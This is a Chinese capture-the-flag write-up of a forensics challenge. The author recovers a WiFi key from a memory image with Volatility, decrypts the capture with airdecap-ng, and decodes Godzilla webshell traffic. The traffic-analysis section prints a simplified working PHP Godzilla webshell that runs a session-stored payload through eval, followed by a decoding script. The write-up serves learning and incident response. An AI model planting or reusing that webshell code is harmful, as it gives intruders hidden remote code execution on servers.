《【陇剑杯WP】wifi题解》

wifi题，是一个师傅快结束的时候丢给我的。那货啥也不说，丢了一串密文过来，后面才知道是哥斯拉，他解题的方法比较强（邪门），我就老老实实根据哥斯拉的加密逆过去了。

题目

网管小王最近喜欢上了ctf网络安全竞赛，他使用“哥斯拉”木马来玩玩upload-labs，并且保存了内存镜像、wifi流量和服务器流量，让您来分析后作答：（本题仅1小问）

小王往upload-labs上传木马后进行了cat /flag，flag内容为_____________。（压缩包里有解压密码的提示，需要额外添加花括号）。 

观察&题解

说实在，这个wifi题属于电子取证类型，一开始我也没啥头绪怎么下手。

1.确认信息

服务器pcap，包序27之前基本都是加密流量，没啥好看的

但是在包序27的地方上传了马

客户端的pcap，很规律的加密，但是我们仍能找到有用的信息：

SSID=My_Wifi、HuaweiDe_4c:55:ec、flage

剩下一个东西就是：windows7-dde00fa9.vmem，这属于VM的东西，突破口就在这里了。

丢kali里面用Volatility，插件不插件这题无所谓啊，我都没搞。【有个坑，2021的kali好像不自带这东西】

2.取证过程(图片太糊见谅，虚拟机里的)

到这一步， 要咋搞呢。 其实还是内存取证，取证就是信息收集，只是换了一个方法就是——分离。 我这里比较懒，直接py文件调用。

vol.py -f Windows\ 7-dde00fa9.vmem  imageinfo 

看看基本信息，忽略那堆报错，我没调用插件导致的。 Win7SP1x86_23418/pe格式

因为这题是wifi题，题干中又说在靶场里传马子，上面识别出来是windows机器，看看他有没有做网络配置了

vol.py -f Windows\ 7-dde00fa9.vmem  --profile=Win7SP1x86_23418 cmdscan

这是比较理想状态下，我们直接查cmd命令执行了什么，似乎真的做了配置，而且export（导出）了！

辣就梭哈文件了，win嘛直接梭哈一波rar和zip就行了

vol.py -f Windows\ 7-dde00fa9.vmem  --profile=Win7SP1x86_23418 filescan |grep -E "rar|zip"

东西有点多，但是看到了熟悉的名字My_Wifi.zip，就是客户端pcap里的SSID了！

其他就先不管，先把My_Wifi.zip分离出来，看看是个啥。

vol.py -f Windows\ 7-dde00fa9.vmem  --profile=Win7SP1x86_23418 dumpfiles -Q 0x000000003fdc38c8 -D ./

D就是 dir的意思，./就是导出在本地。 导出是.dat文件，而且还加密了！ 肯定有猫腻啦！

至于怎么解码，这个好玩了，我和某位师傅在斗法。我也有点懵，解出来是0kb。

找密码的时候，我很鸡贼的换了win的环境，因为被某个大神坑习惯了，他密码从来都在描述里，所以我丢到我的win环境里看。描述信息有东西哇，密码在网卡的GUID里。

网工人都知道网卡的GUID和接口绑定，上面那位师傅直接grep { 梭哈了。 我 就一条命令完事，直接查接口！

vol.py -f Windows\ 7-dde00fa9.vmem --profile=Win7SP1x86_23418 filescan | grep "Interfaces"

记住！ ！ 把花括号也填进去，题干说的！ ！ ！ 我上面解压出0kb就是我没把花括号丢进去。

解压出来是xml文件，看看里面有啥东西吧。 AES、passPhrase、 233@114514_qwe ，应该是某个加密文件的密码，题目里也只剩下一个东西被加密了，那就是客户端pcap了。

无线方面kali也有工具，用最普通的工具去跑——airdecap-ng

airdecap-ng -e My_Wifi -p 233@114514_qwe  khd.cap

参数怎么来的呢 -e 指定目标网络ssid，-p 密码

SSID=My_Wifi，密码233@114514_qwe，那么也衔接上了xml就是用来解码这个包的！

对比一下两个包

解码前

解码后

3.流量分析&木马分析

不得不说，这里追包蛮累的，服务端一大堆一大堆的。

服务端追到包序26、27，会发现明显的分界线。结合题干，应该就是传马的地方了。

不多说，直接解开吧，顺序 urldecode->rev（翻转) -> base64

我觉得上次写蚁剑的不够直观，我直接放代码块里写算了。

我觉得上次写蚁剑的不够直观，我直接放代码块里写算了。

@session_start();//创建会话@set_time_limit(0);//防超时@error_reporting(0);//关闭报错页function encode($D,$K){    for($i=0;$i<strlen($D);$i++) {        $c = $K[$i+1&15];        $D[$i] = $D[$i]^$c;    }    return $D;}//加密算法，对$D进行加密$pass='key';$payloadName='payload';$key='3c6e0b8a9c15224a';//这里是简化了马子，本来是三个参数再进行下面的运算if (isset($_POST[$pass])){    $data=encode(base64_decode($_POST[$pass]),$key);//base64加密    if (isset($_SESSION[$payloadName])){        $payload=encode($_SESSION[$payloadName],$key);        eval($payload);//session中的eval函数记录payload，这里是哥斯拉的强特征        echo substr(md5($pass.$key),0,16);        echo base64_encode(encode(@run($data),$key));        echo substr(md5($pass.$key),16);//前后16位是md5，中间是base64加密    }else{        if (stripos($data,"getBasicsInfo")!==false){            $_SESSION[$payloadName]=encode($data,$key);        }//将payload存入session中    }}

就地取材啊，官方都写好给你了，就直接用官方的解吧。 在解密后的客户端pacp追包到包序1198，即是最后一个会话。 进行提取。

不要拒绝官方的好意，直接拉过来用，配合一下gzdecode函数就完事了。我太久没写php了，Print一直敲成printf，最近在捣鼓逆向，伪代码看多了。

<?phpfunction encode($D,$K){   for($i=0;$i<strlen($D);$i++) {       $c = $K[$i+1&15];       $D[$i] = $D[$i]^$c;    }   return $D;}$a='fL1tMGI4YTljMn75e3jOBS5/V31Qd1NxKQMCe3h4KwFQfVAEVworCi0FfgB+BlWZhjRlQuTIIB5jMTU=';echo gzdecode(encode(base64_decode($a),'3c6e0b8a9c15224a'));?>

在线php执行网站，选5.x的就行，跑一下结果就出来了。

电子取证

电子取证也是属于蓝队 的一部分，可以独立出来作为一个技术分支，也可以归入应急响应里面。 我电子取证方面还是挺菜鸡的，这题也是靠线索关联堆起来的。 如果各位师傅有什么新思路或者新工具可以留言啊，多多益善！

最后解哥斯拉的方法，和我对线的师傅他们是直接用放进哥斯拉里面，然后让哥斯拉帮忙解码，看到flag的，不得不说是一种很好的方法！ 我这里是从马子入手去分析，希望对各位有帮助。

我后续会把之前应急响应日志分析那篇填上，然后这次比赛的其他wp也会陆续更新。 最近也是比较忙的，见谅。

我只是一个还在成长的安全分析师和随叫随到的应急响应工程师，有疑问和合作请各位大佬留言。